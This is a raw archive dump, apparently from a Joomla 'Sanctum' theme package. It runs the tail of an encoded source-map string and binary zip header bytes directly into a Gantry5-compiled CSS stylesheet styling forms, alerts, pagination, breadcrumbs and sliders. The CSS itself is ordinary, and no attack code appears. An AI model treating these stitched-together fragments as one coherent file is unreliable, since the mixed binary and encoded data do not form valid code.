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"}PK!�gP�ϒϒ3it_sanctum/custom/css-compiled/sanctum-joomla_9.cssnu&1i�/* GANTRY5 DEVELOPMENT MODE ENABLED.
 *
 * WARNING: This file is automatically generated by Gantry5. Any modifications to this file will be lost!
 *
 * For more information on modifying CSS, please read:
 *
 * http://docs.gantry.org/gantry5/configure/styles
 * http://docs.gantry.org/gantry5/tutorials/adding-a-custom-style-sheet
 */

@charset "UTF-8";
legend {
  font-size: 1.3rem;
  line-height: 1.5;
}
legend small {
  font-size: 0.8rem;
}
.input-prepend > .add-on, .input-append > .add-on {
  line-height: 1.5;
}
.btn-group > .btn + .dropdown-toggle {
  box-shadow: 1px 1px 1px rgba(0, 0, 0, 0.1);
}
.btn-group.open .btn-primary.dropdown-toggle {
  background: #458334;
  color: #ffffff;
  box-shadow: inset -1px -1px 1px rgba(0, 0, 0, 0.15);
}
.dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus, .dropdown-submenu:hover > a, .dropdown-submenu:focus > a {
  background-image: none;
  background-color: #4f953b;
}
.btn-link {
  color: #4f953b;
}
#login-form {
  margin-bottom: 0;
}
#login-form #form-login-remember {
  margin: 20px 0 10px;
}
#login-form #form-login-remember input {
  margin: 0 5px 0 0;
}
#login-form ul.unstyled {
  margin: 20px 0 0;
}
#login-form ul.unstyled a {
  color: #282828;
}
#login-form ul.unstyled a:hover {
  color: #4f953b;
}
#login-form ul.unstyled a i {
  margin-right: 7px;
}
.nav.menu {
  margin: 0;
}
.nav.menu li {
  margin-bottom: 6.5px;
}
.nav.menu li:last-child {
  margin-bottom: 0;
}
.nav.menu li a {
  color: #282828;
}
.nav.menu li a:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 0.625rem;
}
.nav.menu li a:hover {
  color: #4f953b;
}
.nav.menu li span:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 0.625rem;
}
.nav.menu li ul {
  margin-top: 6.5px;
  margin-bottom: 6.5px;
}
.nav.menu li.current > a, .nav.menu li.current > span {
  color: #4f953b;
}
.well {
  background: transparent;
  border: 1px solid #dddddd;
  border-radius: 0;
  box-shadow: none;
  padding: 30px 30px 10px;
}
.login > form fieldset .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
.login > form fieldset .control-group #remember {
  margin-top: 10px;
}
@media only all and (max-width: 47.99rem) {
  .login > form fieldset .control-group #remember {
    width: auto;
  }
}
@media only all and (max-width: 47.99rem) {
  .login > form fieldset .control-group input {
    width: 100%;
  }
}
.logout .controls {
  margin-left: 0;
}
ul.nav-tabs.nav-stacked > li > a {
  border-radius: 0 !important;
  border: 1px solid #dddddd;
}
ul.nav-tabs.nav-stacked > li > a:hover {
  border: 1px solid #dddddd;
}
.registration #member-registration {
  margin-bottom: 0;
}
.registration #member-registration legend + .control-group {
  margin-top: 0;
}
.registration #member-registration .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
@media only all and (max-width: 47.99rem) {
  .registration #member-registration .control-group input {
    width: 100%;
  }
}
.remind #user-registration, .reset #user-registration {
  margin-bottom: 0;
}
.remind #user-registration fieldset p, .reset #user-registration fieldset p {
  margin-top: 0;
}
.remind #user-registration .control-group .control-label, .reset #user-registration .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
.profile > ul.btn-toolbar {
  margin-top: 0;
}
.profile #users-profile-core {
  margin-bottom: 20px;
}
.profile fieldset dl dt {
  text-align: left;
}
.profile-edit #member-profile {
  margin-bottom: 0;
}
.profile-edit #member-profile .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
.profile-edit #member-profile .control-group .chzn-container {
  padding-top: 8px;
}
.list-striped, .row-striped {
  border-top: 1px solid #dddddd;
}
.list-striped li, .list-striped dd, .row-striped .row, .row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
}
.list-striped li:nth-child(odd), .list-striped dd:nth-child(odd), .row-striped .row:nth-child(odd), .row-striped .row-fluid:nth-child(odd) {
  background-color: #fcfcfc;
}
.list-striped li:hover, .list-striped dd:hover, .row-striped .row:hover, .row-striped .row-fluid:hover {
  background-color: #f2f2f2;
}
.list-bordered, .row-bordered {
  border: 1px solid #dddddd;
}
.row-even, .row-odd {
  border-bottom: 1px solid #dddddd;
}
.row-even {
  background-color: #fcfcfc;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
blockquote {
  border-left: 5px solid #dddddd;
}
blockquote small {
  color: #c8c8c8;
}
blockquote.pull-right {
  border-right: 5px solid #dddddd;
}
legend {
  color: #333333;
}
legend small {
  color: #999999;
}
.input-prepend .chzn-container-single .chzn-single, .input-append .chzn-container-single .chzn-single {
  border-color: #dddddd;
}
.input-prepend .chzn-container-single .chzn-drop, .input-append .chzn-container-single .chzn-drop {
  border-color: #dddddd;
}
textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"], input[type="week"], input[type="number"], input[type="email"], input[type="url"], input[type="search"], input[type="tel"], input[type="color"], .uneditable-input {
  background-color: #ffffff;
  border: 1px solid #d5d5d5;
  box-shadow: none;
  padding: 10px;
  border-radius: 0;
  -webkit-transition: border 0.2s linear, box-shadow 0.2s linear;
  -moz-transition: border 0.2s linear, box-shadow 0.2s linear;
  transition: border 0.2s linear, box-shadow 0.2s linear;
}
textarea:focus, input[type="text"]:focus, input[type="password"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="date"]:focus, input[type="month"]:focus, input[type="time"]:focus, input[type="week"]:focus, input[type="number"]:focus, input[type="email"]:focus, input[type="url"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="color"]:focus, .uneditable-input:focus {
  box-shadow: none;
}
#g-aside input, #g-aside textarea, #g-aside .uneditable-input, #g-sidebar input, #g-sidebar textarea, #g-sidebar .uneditable-input, #g-offcanvas input, #g-offcanvas textarea, #g-offcanvas .uneditable-input {
  width: 100%;
}
#g-aside input[type="file"], #g-aside input[type="image"], #g-aside input[type="submit"], #g-aside input[type="reset"], #g-aside input[type="button"], #g-aside input[type="radio"], #g-aside input[type="checkbox"], #g-sidebar input[type="file"], #g-sidebar input[type="image"], #g-sidebar input[type="submit"], #g-sidebar input[type="reset"], #g-sidebar input[type="button"], #g-sidebar input[type="radio"], #g-sidebar input[type="checkbox"], #g-offcanvas input[type="file"], #g-offcanvas input[type="image"], #g-offcanvas input[type="submit"], #g-offcanvas input[type="reset"], #g-offcanvas input[type="button"], #g-offcanvas input[type="radio"], #g-offcanvas input[type="checkbox"] {
  width: auto;
}
#g-header .search form, #g-navigation .search form {
  margin-bottom: 0;
}
#g-header .search input, #g-navigation .search input {
  margin-bottom: 0;
  border: 0;
}
.view-mailto #g-page-surround, .body-only #g-page-surround {
  box-shadow: none;
}
.nav-tabs.nav-dark {
  border-bottom: 1px solid #333;
  text-shadow: 1px 1px 1px #000;
}
.nav-tabs.nav-dark > li > a {
  color: #F8F8F8;
}
.nav-tabs.nav-dark > li > a:hover {
  border-color: #333 #333 #111;
  background-color: #777777;
}
.nav-tabs.nav-dark > .active > a, .nav-tabs.nav-dark > .active > a:hover {
  color: #ffffff;
  background-color: #555555;
  border: 1px solid #222;
}
.tip-wrap {
  color: #fff;
  background-color: #000;
}
.search span.highlight {
  background-color: #fcfcfc;
}
.img-polaroid {
  background-color: #ffffff;
  border: 1px solid rgba(0, 0, 0, 0.2);
  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
}
.muted {
  color: #999999;
}
a.muted:hover, a.muted:focus {
  color: #808080;
}
.alert {
  background-color: #f8f4ec;
  border-color: #eee4d2;
}
.alert a, .alert a:hover, .alert .alert-link, .alert .alert-link:hover {
  color: #a47e3c;
  font-weight: bold;
}
.alert a:hover, .alert a:hover:hover, .alert .alert-link:hover, .alert .alert-link:hover:hover {
  text-decoration: underline;
}
.alert, .text-warning {
  color: #c09853;
}
.alert h4 {
  color: #c09853 !important;
}
a.text-warning:hover, a.text-warning:focus {
  color: #b78c43;
}
.alert-success {
  color: #468847;
  background-color: #dfeedf;
  border-color: #c4e0c4;
}
.alert-success a, .alert-success a:hover, .alert-success .alert-link, .alert-success .alert-link:hover {
  color: #356635;
  font-weight: bold;
}
.alert-success a:hover, .alert-success a:hover:hover, .alert-success .alert-link:hover, .alert-success .alert-link:hover:hover {
  text-decoration: underline;
}
.text-success {
  color: #468847;
}
.alert-success h4 {
  color: #468847 !important;
}
a.text-success:hover, a.text-success:focus {
  color: #3d773e;
}
.alert-danger, .alert-error {
  color: #b94a48;
  background-color: #f6e7e7;
  border-color: #edd1d0;
}
.alert-danger a, .alert-danger a:hover, .alert-danger .alert-link, .alert-danger .alert-link:hover, .alert-error a, .alert-error a:hover, .alert-error .alert-link, .alert-error .alert-link:hover {
  color: #953b39;
  font-weight: bold;
}
.alert-danger a:hover, .alert-danger a:hover:hover, .alert-danger .alert-link:hover, .alert-danger .alert-link:hover:hover, .alert-error a:hover, .alert-error a:hover:hover, .alert-error .alert-link:hover, .alert-error .alert-link:hover:hover {
  text-decoration: underline;
}
.text-error {
  color: #b94a48;
}
.alert-danger h4, .alert-error h4 {
  color: #b94a48 !important;
}
a.text-error:hover, a.text-error:focus {
  color: #a74240;
}
.alert-info {
  color: #3a87ad;
  background-color: #e2eff5;
  border-color: #c7e0ec;
}
.alert-info a, .alert-info a:hover, .alert-info .alert-link, .alert-info .alert-link:hover {
  color: #2d6987;
  font-weight: bold;
}
.alert-info a:hover, .alert-info a:hover:hover, .alert-info .alert-link:hover, .alert-info .alert-link:hover:hover {
  text-decoration: underline;
}
.text-info {
  color: #3a87ad;
}
.alert-info h4 {
  color: #3a87ad !important;
}
a.text-info:hover, a.text-info:focus {
  color: #34789a;
}
.platform-content input {
  box-sizing: inherit;
}
.form-actions {
  background-color: transparent;
  border: none;
  margin: 0;
  padding: 0;
}
.element-invisible {
  border: 0 none;
  height: 1px;
  margin: 0;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}
.contact > h3 {
  display: none;
}
.contact .contact-address {
  margin: 0;
}
.contact #contact-form {
  margin-bottom: 0;
}
.contact #contact-form fieldset > legend {
  font-size: 0.9rem;
  color: #282828;
  margin-bottom: 0;
}
.contact #contact-form.form-horizontal .control-label {
  text-align: left;
}
.contact #contact-form input, .contact #contact-form textarea {
  width: 100%;
}
@media only all and (max-width: 47.99rem) {
  .contact #contact-form input, .contact #contact-form textarea {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .contact #contact-form input, .contact #contact-form textarea {
    width: 100%;
  }
}
.contact #contact-form #jform_contact_email_copy {
  width: 10px;
}
.contact #contact-form label {
  margin-top: 3px;
}
.contact #contact-form #jform_contact_email_copy-lbl {
  margin-top: 0;
}
@media only all and (max-width: 47.99rem) {
  .contact #contact-form .form-actions {
    padding: 0;
  }
  .contact #contact-form .form-actions > button {
    display: block;
    width: 100%;
  }
}
.contact #contact-form.well {
  border: none;
  padding: 0;
  background: none;
}
ul.breadcrumb {
  margin: 6px 0 0;
  padding: 0;
  background: none;
  text-align: center;
}
@media only all and (max-width: 47.99rem) {
  ul.breadcrumb {
    margin: 0;
  }
}
ul.breadcrumb li {
  text-shadow: none;
}
ul.breadcrumb li .divider {
  display: none;
}
ul.breadcrumb li + li:after {
  content: "/ ";
  padding: 0 5px;
}
ul.breadcrumb li + li:last-child:after {
  content: none;
  padding: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-grid > .g-block:last-child ul.breadcrumb {
    text-align: center;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-grid > .g-block:first-child ul.breadcrumb {
    text-align: center;
  }
}
.blog .category-desc, .blog-featured .category-desc {
  margin: -10px 0 30px;
}
.blog .items-more ol, .blog-featured .items-more ol {
  padding-left: 0;
  margin: 0 0 60px 0;
}
.blog article.item, .blog-featured article.item {
  margin-bottom: 60px;
}
.item-page ul.pager {
  margin-bottom: 0;
}
article .item-image {
  margin: 20px 0;
}
.tag-category li h3 {
  margin: 10px 0;
}
.tag-category li h3 a {
  color: #282828;
}
.tag-category li h3 a:hover {
  color: #4f953b;
}
.tag-category form {
  margin-bottom: 0;
}
.g-article-header {
  position: relative;
  padding: 0;
}
.g-article-header > .icons {
  position: relative;
  right: 0;
  top: 32px;
  right: 15px;
}
.g-article-header > .icons .btn-group .btn {
  background: transparent !important;
  border: 0px solid #ffffff !important;
  padding: 0.3rem 0.6rem !important;
}
.g-article-header > .icons .btn-group .btn [class^="icon-"], .g-article-header > .icons .btn-group .btn [class*=" icon-"] {
  color: #959595 !important;
  margin-right: 0px;
}
@media only all and (max-width: 47.99rem) {
  .g-article-header > .icons .btn-group .btn [class^="icon-"], .g-article-header > .icons .btn-group .btn [class*=" icon-"] {
    margin-top: 5px;
  }
}
.g-article-header > .icons .btn-group .btn .caret {
  display: none;
}
.g-article-header > .icons .btn-group .btn:hover {
  color: #4f953b !important;
}
.g-article-header .page-header h2 {
  margin: 0 0 -10px 0;
}
.g-article-header .page-header h2 a {
  color: #282828;
}
.g-article-header .page-header h2 a:hover {
  color: #4f953b;
}
.readmore {
  margin: 0;
}
.readmore .btn span {
  display: none;
}
.tags {
  margin-bottom: 1.5rem;
}
.article-info {
  color: #959595;
  margin: 20px 0 0;
  background: transparent;
  border: 1px solid #dddddd;
  padding: 1rem 1.5rem;
}
.article-info a {
  color: #959595;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin: 0 20px 0 0;
}
.article-info dd i {
  margin-right: 5px;
}
@media only all and (max-width: 47.99rem) {
  .article-info {
    text-align: center;
  }
}
.content-category form {
  margin-bottom: 0;
}
.content-category .pagination {
  margin-bottom: 0;
}
.content-category .pagination > ul {
  margin-bottom: 0;
  box-shadow: none;
}
.content-category .pagination .counter {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .content-category .pagination .counter {
    float: none;
  }
}
.pagination {
  margin: 0;
}
.pagination ul {
  margin: 0;
  box-shadow: none;
}
.pagination ul > li > a, .pagination ul > li > span {
  color: inherit;
  padding: 0.675rem 1rem;
  margin-right: 5px;
  border: 1px solid #dddddd;
  border-radius: 0px !important;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
.pagination ul > li > a:hover, .pagination ul > li > span:hover {
  color: #ffffff;
  background: #4f953b;
  border-color: #4f953b;
}
.pagination ul > .active > a, .pagination ul > .active > span {
  color: #ffffff;
  background: #4f953b;
  border-color: #4f953b;
}
.pagination .counter {
  margin: 7px 0 0;
}
@media only all and (max-width: 47.99rem) {
  .pagination .counter {
    float: none;
  }
}
.pager li a {
  color: inherit;
  border: 1px solid inherit;
  background: transparent;
  border-radius: 0px;
  padding: 0.675rem 1.5rem;
}
.pager li a:hover {
  color: #ffffff;
  background: #4f953b;
  border-color: #4f953b;
}
.rev_slider_wrapper .tp-caption a.button {
  color: #ffffff;
}
.rev_slider_wrapper .tp-caption a.button.dark {
  margin-left: 10px;
}
.rev_slider_wrapper .tparrows:before {
  color: #FFFFFF;
  display: inline-block;
  font-family: FontAwesome, sans-serif;
  font-size: 20px;
  font-style: normal;
  font-weight: bold;
  margin-right: 0;
  margin-top: 2px;
  text-align: center;
  text-decoration: inherit;
  width: 35px;
}
.rev_slider_wrapper .tparrows {
  background: #000000;
  background: none repeat scroll 0 0 rgba(0, 0, 0, 0.4);
  border-radius: 5px;
  cursor: pointer;
  height: 35px;
  width: 35px;
  -webkit-transition: background 0.3s, opacity 0.3s;
  -moz-transition: background 0.3s, opacity 0.3s;
  transition: background 0.3s, opacity 0.3s;
}
.rev_slider_wrapper .tparrows:hover {
  color: #FFFFFF;
}
.rev_slider_wrapper .tp-leftarrow:before {
  content: "";
}
.rev_slider_wrapper .tp-rightarrow:before {
  content: "";
}
.rev_slider_wrapper .tparrows.tp-rightarrow:before {
  margin-left: 1px;
}
.rev_slider_wrapper .tparrows:hover {
  background: #000000;
}
.nssp2 .ns2-title {
  margin: 0 0 10px;
  font-size: 1.035rem;
  font-weight: normal;
}
.nssp2 .ns2-title a {
  color: #282828;
}
.nssp2 .ns2-title a:hover {
  color: #4f953b;
}
.nssp2 .ns2-introtext {
  margin: 0;
}
.nssp2 .ns2-social span {
  margin-left: 0 !important;
  margin-right: 10px;
}
.nssp2 .ns2-rating {
  margin-bottom: 10px;
}
.nssp2 .ns2-links {
  margin-top: 10px;
  font-size: 0.81rem;
}
.nssp2 .ns2-links .ns2-created {
  margin-right: 15px;
}
.nssp2 .ns2-links .ns2-created:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 2px;
}
.nssp2 .ns2-links .ns2-author {
  margin-right: 15px;
}
.nssp2 .ns2-links .ns2-author:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 2px;
}
.nssp2 .ns2-links .ns2-category {
  margin-right: 15px;
}
.nssp2 .ns2-links .ns2-category a {
  color: #959595;
}
.nssp2 .ns2-links .ns2-category a:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 2px;
}
.nssp2 .ns2-links .ns2-category a:hover {
  color: #4f953b;
}
.nssp2 .ns2-links .ns2-comments {
  margin: 0;
  margin-right: 15px;
  color: #959595;
  background: none;
  padding: 0;
  font-size: inherit;
}
.nssp2 .ns2-links .ns2-comments:before {
  content: "";
  font-family: FontAwesome;
  margin-right: 6px;
}
.nssp2 .ns2-links .ns2-comments:hover {
  color: #4f953b;
}
.nssp2 .ns2-links .ns2-hits {
  margin-right: 15px;
  background: none;
  padding: 0;
  color: #959595;
  font-size: inherit;
}
